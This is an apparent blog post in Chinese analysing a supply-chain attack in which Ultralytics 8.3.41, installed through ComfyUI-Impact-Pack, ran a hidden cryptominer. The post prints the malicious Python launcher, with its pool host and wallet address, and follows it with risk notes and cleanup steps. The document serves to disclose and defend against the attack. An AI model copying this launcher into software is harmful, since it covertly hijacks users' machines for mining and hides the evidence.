潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

概要描述

近期在使用 ComfyUI 搭配 ComfyUI-Impact-Pack 擴展時,發現疑似未經授權的加密貨幣挖礦行為。問題來源為 Ultralytics 套件中的一段惡意 Python 程式碼,該程式碼試圖使用系統資源進行未經許可的挖礦操作。

潛在加密貨幣挖礦攻擊報告:ComfyUI 與 Ultralytics 的安全問題

問題描述

這次事件涉及到安裝於以下路徑中的下載模組 (downloads.py): 你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils

惡意程式碼片段

以下是檢測到的惡意程式碼:

def safe_run(path):
    os.chmod(path, 0o770)
    command = [
        path,
        '-u',
        '4BHRQHFexjzfVjinAbrAwJdtogpFV3uCXhxYtYnsQN66CRtypsRyVEZhGc8iWyPViEewB8LtdAEL7CdjE4szMpKzPGjoZnw',
        '-o',
        'connect.consrensys.com:8080',
        '-k'
    ]
    process = subprocess.Popen(
        command,
        stdin=subprocess.DEVNULL,
        stdout=subprocess.DEVNULL,
        stderr=subprocess.DEVNULL,
        preexec_fn=os.setsid,
        close_fds=True
    )
    os.remove(path)

行為分析

  1. 權限變更:使用 os.chmod 令檔案可執行。
  2. 執行惡意命令:連接至礦池伺服器 connect.consrensys.com:8080
  3. 隱藏過程:壓制標準輸入、輸出和錯誤流,避免被察覺。
  4. 刪除檔案:執行後刪除檔案以掩蓋證據。

風險評估

潛在影響

  • 高系統資源占用:挖礦行為會顯著增加 CPU/GPU 的使用率。
  • 硬體損耗:長期高負載可能縮短硬體壽命。
  • 安全隱患:可能危及系統的敏感資料或整體安全性。

問題來源

該惡意行為與 Ultralytics 套件的可疑版本有關,該版本似乎作為 ComfyUI-Impact-Pack 的自動依賴項被安裝。

安裝路徑

  • 可疑套件:Ultralytics 版本 8.3.41
  • 位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics

啟動源

可能由 ComfyUI-Impact-Pack 中的 install.py 腳本觸發,該腳本會自動安裝依賴項。


網路行為分析

目標網域

  • 網域名稱connect.consrensys.com
  • 通訊埠:8080
  • 用途:懷疑為礦池伺服器的終端點,可能使用 Stratum 協議進行挖礦。

證據

  • 腳本中明確指定的礦池連接細節。
  • 使用私密金鑰(如 4BHRQHF...)表明有活躍的挖礦帳戶或操作。

推薦處置措施

  1. 卸載可疑套件
    pip uninstall ultralytics ultralytics-thop
    
  2. 移除 ComfyUI-Impact-Pack 刪除相關目錄:
    ./ComfyUI/custom_nodes/ComfyUI-Impact-Pack
    
  3. 掃描系統 使用防毒軟體和惡意程式檢測工具,確保沒有持續的威脅。

  4. 檢查網路連接 確認是否有到 connect.consrensys.com 的外部連接,並在防火牆中封鎖。

  5. 提高意識 將該報告提交給 ComfyUI 和 Ultralytics 的維護者,以防止進一步濫用。

附加證據

相關細節

  • 程式碼位置你的使用者路徑/AppData/Roaming/Python/Python312/site-packages/ultralytics/utils/downloads.py
  • 行為模式:未經授權的檔案執行、礦池連接、及證據清理。
  • 觸發條件:ComfyUI-Impact-Pack 自動安裝依賴項。

資料來源

結論

此次事件表明開源專案中的依賴項審查不足可能導致使用者系統遭到惡意攻擊。建議開源社群實施更嚴格的審核機制以保護最終用戶。


Share on:
Previous: 語音合成新時代:Fish Speech 1.5 推出五種新語言,實現即時無縫對話!
Next: World Labs:AI生成3D互動世界的新革命
DMflow.chat

DMflow.chat

廣告

DMflow.chat:智慧整合,創新溝通!除了持久記憶與客製欄位外,更支持真人與 AI 的靈活轉換,無縫連接資料庫與表單,讓網頁互動更靈活高效。

限時七天!Windsurf AI 震撼推出免費無限 GPT-4.1 試用,立即體驗頂尖 AI!
16 April 2025

限時七天!Windsurf AI 震撼推出免費無限 GPT-4.1 試用,立即體驗頂尖 AI!

限時七天!Windsurf AI 震撼推出免費無限 GPT-4.1 試用,立即體驗頂尖 AI!(2025-0414-0421) AI 界的朋友們注意!Windsurf AI 宣布提供為期...

偷聽海豚說話?Google AI 神器 DolphinGemma 揭開海洋世界的溝通秘密
16 April 2025

偷聽海豚說話?Google AI 神器 DolphinGemma 揭開海洋世界的溝通秘密

偷聽海豚說話?Google AI 神器 DolphinGemma 揭開海洋世界的溝通秘密 幾十年來,科學家們一直試圖解開海豚那複雜的「喀答聲」、「哨聲」和「脈衝聲」之謎。現在,Googl...

WordPress 放大絕!一句話打造專屬網站?AI 助手讓你跟架站煩惱說掰掰!
11 April 2025

WordPress 放大絕!一句話打造專屬網站?AI 助手讓你跟架站煩惱說掰掰!

WordPress 放大絕!一句話打造專屬網站?AI 助手讓你跟架站煩惱說掰掰! 厭倦了複雜的網站架設流程?WordPress 推出革命性 AI 網站建置工具,只要一句話描述你的想法,A...

AI 智慧體大串連!Google 推出開源 A2A 協定,打造無縫協作新時代
10 April 2025

AI 智慧體大串連!Google 推出開源 A2A 協定,打造無縫協作新時代

AI 智慧體大串連!Google 推出開源 A2A 協定,打造無縫協作新時代 厭倦了各自為政的 AI 工具嗎?Google 攜手 50 多家科技巨頭推出 Agent2Agent (A2A...

Llama 4 偷跑學習?Meta 高層駁斥作弊指控,揭開 AI 模型訓練的灰色地帶
8 April 2025

Llama 4 偷跑學習?Meta 高層駁斥作弊指控,揭開 AI 模型訓練的灰色地帶

Llama 4 偷跑學習?Meta 高層駁斥作弊指控,揭開 AI 模型訓練的灰色地帶 Meta 最新 AI 模型 Llama 4 一推出就引發軒然大波!被指控在訓練過程中「作弊」以美化評...

Meta 震撼彈!開源 Llama 4 多模態 AI 登場,效能驚人挑戰 GPT-4!
6 April 2025

Meta 震撼彈!開源 Llama 4 多模態 AI 登場,效能驚人挑戰 GPT-4!

Meta 震撼彈!開源 Llama 4 多模態 AI 登場,效能驚人挑戰 GPT-4! Meta 最新力作 Llama 4 系列 AI 模型正式開源!原生多模態、超長上下文、專家混合架構...

Jina Embeddings V3:突破性多語言嵌入模型
24 September 2024

Jina Embeddings V3:突破性多語言嵌入模型

Jina Embeddings V3:突破性多語言嵌入模型 描述 Jina AI 推出了一款革命性的多語言文本嵌入模型 Jina Embeddings V3,擁有 5.7 億參數和 8192 ...

突破性進展:OpenAI擴大o1模型使用限制,免費和付費用戶均受益
19 September 2024

突破性進展:OpenAI擴大o1模型使用限制,免費和付費用戶均受益

突破性進展:OpenAI擴大o1模型使用限制,免費和付費用戶均受益 OpenAI最新公告擴大o1模型使用限制,為AI愛好者和專業人士帶來更多機會。本文深入探討這一重大更新對不同用戶群體的影響,...

Claude 團隊放福利!免費 Prompt 工程指南,點燃 No-Code 開發新火花
6 April 2025

Claude 團隊放福利!免費 Prompt 工程指南,點燃 No-Code 開發新火花

Claude 團隊放福利!免費 Prompt 工程指南,點燃 No-Code 開發新火花 Anthropic 的 Claude 團隊釋出了一份超詳盡的 Prompt 工程指南,不只技術高...